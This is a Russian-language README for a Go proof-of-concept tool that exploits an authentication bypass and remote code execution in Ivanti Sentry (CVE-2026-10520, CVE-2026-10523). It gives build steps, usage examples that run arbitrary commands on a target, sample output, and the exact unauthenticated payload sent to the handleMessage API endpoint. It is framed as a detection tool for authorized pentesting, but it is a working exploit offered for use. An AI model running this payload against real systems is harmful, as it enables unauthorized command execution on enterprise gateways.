
Инструмент обнаружения концепта для обхода аутентификации и уязвимостей удаленного выполнения кода Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Отправляет специально созданные API-запросы для выполнения системных команд и проверки уязвимых развертываний.
Комплексный инструмент обнаружения proof-of-concept для проверки уязвимостей Ivanti Sentry, связанных с обходом аутентификации и удалённым выполнением кода. Этот инструмент выявляет системы, уязвимые к CVE-2026-10520 и CVE-2026-10523.
Этот проект предназначен для обнаружения и проверки того, является ли экземпляр Ivanti Sentry уязвимым к критическим ошибкам обхода аутентификации и удалённого выполнения кода. Инструмент отправляет специально сформированные сообщения через конечную точку API Ivanti Sentry для выполнения системных команд и извлечения результатов, что позволяет исследователям безопасности и пентестерам выявлять уязвимые развёртывания.
Уязвимость обхода аутентификации в Ivanti Sentry, которая позволяет неаутентифицированный доступ к ограниченным конечным точкам API.
Уязвимость удалённого выполнения кода в Ivanti Sentry, которая позволяет выполнять произвольные системные команды через messaging API в сочетании с обходом аутентификации.
Клонируйте репозиторий и перейдите в каталог проекта:
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry
Инициализируйте модуль и установите библиотеки:
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy
Соберите исполняемый файл:
go build -o tot_poc tot_poc.go

Инструмент требует два обязательных параметра: URL цели и команду для выполнения.

Выполните простую команду на цели:
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
-url (обязательный): Базовый URL цели, включая протокол (например, https://127.0.0.1:8443)-cmd (обязательный): Команда для выполнения при обнаружении уязвимости (например, "uname -a", "id", "whoami")-p или -proxy (необязательный): Адрес и порт прокси для маршрутизации трафика (например, 127.0.0.1:8080)
Обнаружение уязвимости с помощью простой команды получения информации о системе:
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
Запуск с настройкой прокси:
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
Выполнение команды для извлечения информации о системе:
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
Инструмент отображает:
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.
Инструмент эксплуатирует конечную точку /mics/api/v2/sentry/mics-config/handleMessage, доступную без аутентификации. Полезная нагрузка формируется следующим образом:
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
Ответ содержит вывод команды в формате XML внутри тега success.
Этот инструмент предоставляется только для авторизованного тестирования безопасности и исследовательских целей. Пользователи несут единоличную ответственность за получение надлежащего разрешения перед тестированием любых систем. Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом.
GhostGTR666 - Gagaltotal666
Этот проект предоставляется как есть для исследовательских и образовательных целей в области безопасности.